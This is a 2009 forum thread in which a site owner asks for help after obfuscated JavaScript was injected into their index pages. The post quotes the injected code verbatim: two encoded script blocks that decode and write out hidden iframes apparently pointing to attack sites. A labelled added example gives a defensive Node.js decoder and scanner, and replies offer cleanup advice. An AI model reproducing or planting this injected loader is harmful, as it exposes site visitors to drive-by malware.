my webspace has been hacked!

Posted by: mrg9999
Posted on: 2009-05-23 00:55:00

This or a variation of this code has been added to all my index.html files.

It opens various other websites, or tries to download a trojan.

I can't find out how they did it. The access logs don't show anyone else logging in. Support never got back to me. I have deleted all my users and changed my SSH and FTP passwords.
Google now shows me as an attack site!!

Suggestions?



--cut

<body id="body"><script>s='DMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHICNHDHJHDHEGFGNHDCOGOGBGNGFCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEFDOANAKDMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHEGPGKGBGOGEGHGMGPHHCOGDGPGNCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEF';x='';sl=s.length;for(i=0;i<sl;i=i+2){x+=String.fromCharCode(((s.charCodeAt(i)-65)<<4)+s.charCodeAt(i+1)-65);}document.write(x);</script><script>s='DMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHICNHDHJHDHEGFGNHDCOGOGBGNGFCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEFDOANAKDMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHEGPGKGBGOGEGHGMGPHHCOGDGPGNCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEF';x='';sl=s.length;for(i=0;i<sl;i=i+2){x+=String.fromCharCode(((s.charCodeAt(i)-65)<<4)+s.charCodeAt(i+1)-65);}document.write(x);</script>



</html>
-cut
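
An added example, not part of the original post or any reply: Node.js code that decodes the letter-pair encoding used by the script above as plain data, without running it, and flags script blocks that carry it. The function names, the sample page and the URL in it are constructed for illustration.

```javascript
'use strict';
// Added example. Decodes the letter-pair payload as data; nothing is eval'd or written to a DOM.

// Each byte is two letters 'A'..'P' (nibble = char code - 65), high nibble first,
// the inverse of the ((a-65)<<4)+(b-65) loop in the injected script.
function decodeNibbles(s) {
  if (s.length % 2 !== 0 || !/^[A-P]*$/.test(s)) return null; // not this encoding
  let out = '';
  for (let i = 0; i < s.length; i += 2) {
    out += String.fromCharCode(((s.charCodeAt(i) - 65) << 4) + (s.charCodeAt(i + 1) - 65));
  }
  return out;
}

// Encoder, used here only to build the constructed sample below.
function encodeNibbles(text) {
  return Array.from(text, (c) => {
    const b = c.charCodeAt(0) & 0xff;
    return String.fromCharCode(65 + (b >> 4), 65 + (b & 15));
  }).join('');
}

// Report every <script> that holds a long A-P literal and calls document.write.
function scanHtml(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const lit = /=\s*'([A-P]{40,})'/.exec(m[1]);
    if (!lit || !m[1].includes('document.write')) continue;
    const decoded = decodeNibbles(lit[1]);
    if (decoded === null) continue;
    // Defang URLs so the report cannot be clicked or auto-linked.
    const urls = (decoded.match(/https?:\/\/[^\s"'<>]+/gi) || [])
      .map((u) => u.replace(/^http/i, 'hxxp').replace(/\./g, '[.]'));
    findings.push({ offset: m.index, hidesIframe: /<iframe\b/i.test(decoded), urls });
  }
  return findings;
}

// Constructed sample: a harmless iframe tag encoded the same way, plus a normal script.
const HIDDEN = '<IFRAME src="http://injected.example/landing" width="1" height="1"></IFRAME>';
const SAMPLE = '<html><body id="body"><script>s=\'' + encodeNibbles(HIDDEN) +
  '\';x=\'\';/* decode loop */document.write(x);</script>' +
  '<script>var ok = 1;</script></body></html>';

console.log(JSON.stringify(scanHtml(SAMPLE), null, 2));
```

To check real files, pass each index file's contents to `scanHtml` and compare the reported offsets against a known-good copy.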




Re: my webspace has been hacked!

Posted by: Atropos7
Posted on: 2009-05-23 01:51:00

In reply to:

I can't find out how they did it. The access logs don't show anyone else logging in. Support never got back to me. I have deleted all my users and changed my SSH and FTP passwords.
Google now shows me as an attack site!!


Read http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites or find someone who can do all that for you.



cool openvein.org -//-

Re: my webspace has been hacked!

Posted by: sXi
Posted on: 2009-05-23 08:45:00

I've fixed quite a few hacked sites on DH accounts that used index file script embeds as their primary target. Most are WordPress exploits, but with the most recent one the hackers hadn't cleaned up after themselves correctly and had left files on the user's account that indicated a PERL attack. Check your root userspace for any PERL scripts, as you might be able to glean info from the contents if they remain present.




How To Install PHP.INI / ionCube on DreamHost

Tags: ftp passwords, index html files, google, ssh, variation